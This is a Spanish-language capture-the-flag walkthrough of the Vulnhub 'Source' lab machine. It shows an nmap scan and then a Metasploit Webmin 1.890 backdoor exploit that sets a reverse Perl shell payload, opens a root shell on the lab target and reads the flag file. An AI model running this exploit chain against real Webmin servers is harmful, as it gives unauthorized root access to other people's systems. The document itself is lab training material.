[VULNHUB] Source

Hoy vamos a hackear la maquina de Vulnhub llamada Source. Podeis descargarla desde el siguiente enlace: Source

Video


Enumeration


Empezamos con un nmap para ver que puertos tiene abiertos.

sml@m0nique:~$ nmap -A -p- 192.168.112.143
Starting Nmap 7.80 ( https://nmap.org ) at 2020-07-31 13:13 CEST
Nmap scan report for 192.168.112.143
Host is up (0.0013s latency).
Not shown: 65533 closed ports
PORT      STATE SERVICE VERSION
22/tcp    open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 
2.0)
| ssh-hostkey: 
|   2048 b7:4c:d0:bd:e2:7b:1b:15:72:27:64:56:29:15:ea:23 (RSA)
|   256 b7:85:23:11:4f:44:fa:22:00:8e:40:77:5e:cf:28:7c (ECDSA)
|_  256 a9:fe:4b:82:bf:89:34:59:36:5b:ec:da:c2:d3:95:ce (ED25519)
10000/tcp open  http    MiniServ 1.890 (Webmin httpd)
|_http-title: Site doesn't have a title (text/html; Charset=iso-8859-1).
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at 
https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 57.45 seconds
Podemos ver que tiene MiniServ con la version 1.890, la cual tiene una backdoor si es de sourceforge.

Exploitation


Arrancamos metasploit.

msfconsole
Usaremos el modulo "exploit/linux/http/webmin_backdoor".

msf5 > use exploit/linux/http/webmin_backdoor
msf5 exploit(linux/http/webmin_backdoor) > show options

Module options (exploit/linux/http/webmin_backdoor):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   Proxies                     no        A proxy chain of format 
type:host:port[,type:host:port][...]
   RHOSTS                      yes       The target host(s), range CIDR 
identifier, or hosts file with syntax 'file:'
   RPORT      10000            yes       The target port (TCP)
   SRVHOST    0.0.0.0          yes       The local host or network interface to 
listen on. This must be an address on the local machine or 0.0.0.0 to listen on 
all addresses.
   SRVPORT    8080             yes       The local port to listen on.
   SSL        false            no        Negotiate SSL/TLS for outgoing 
connections
   SSLCert                     no        Path to a custom SSL certificate 
(default is randomly generated)
   TARGETURI  /                yes       Base path to Webmin
   URIPATH                     no        The URI to use for this exploit 
(default is random)
   VHOST                       no        HTTP server virtual host


Payload options (cmd/unix/reverse_perl):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST                   yes       The listen address (an interface may be 
specified)
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Automatic (Unix In-Memory)
Hacemos el "set" de los valores.

msf5 exploit(linux/http/webmin_backdoor) > set lhost 192.168.112.128
msf5 exploit(linux/http/webmin_backdoor) > set rhosts 192.168.112.143
msf5 exploit(linux/http/webmin_backdoor) > set ssl true
Y por ultimo, lanzamos el exploit!

msf5 exploit(linux/http/webmin_backdoor) > exploit

[*] Started reverse TCP handler on 192.168.112.128:4444 
[*] Configuring Automatic (Unix In-Memory) target
[*] Sending cmd/unix/reverse_perl command payload
[*] Command shell session 1 opened (192.168.112.128:4444 -> 
192.168.112.143:49484) at 2020-07-31 13:38:38 +0200

id
uid=0(root) gid=0(root) groups=0(root)

root.txt



cd /root
ls /root
root.txt
cat /root/root.txt
THM{UPDATE_YOUR_INSTALL}

End


Y con esto ya seriamos root de la maquina